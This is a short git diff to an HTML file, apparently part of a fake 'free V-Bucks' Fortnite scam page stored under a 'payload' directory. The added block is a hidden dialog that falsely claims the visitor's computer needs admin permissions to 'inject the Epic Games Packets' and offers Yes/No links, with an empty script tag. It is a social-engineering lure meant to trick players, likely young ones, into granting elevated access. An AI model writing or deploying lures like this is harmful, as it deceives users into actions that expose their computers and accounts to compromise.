--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -129,6 +129,16 @@
                                     </div>
                                 </div>
                                 
+                                <div class="wrap-wrap" style="display:none;" id="confirm">
+                                    <div class="col-sm-9 col-xs-9 center-block input-wrap text-center">
+                                        <h4 style="font-family: fortnite; font-size: 20px; text-transform: uppercase;">Your computer might need admin permissions to inject the Epic Games Packets successfully. Do you want to continue? </h4>
+                                        <a href="index.html#" id="confirm_yes"><span> Yes </span></a>
+                                        <a href="index.html#" id="confirm_no"><span> No </span></a>
+                                        <script type="text/javascript">
+                                        </script>
+                                    </div>
+                                </div>
+
                                 <div class="col-lg-12 sticky-alert" style="margin-top: 12px;" id="live_activity">
                                     <div class="col-lg-12 sticky-alert">
                                         <p style="font-family: fortnite; font-size: 25px; margin-bottom: 12px">
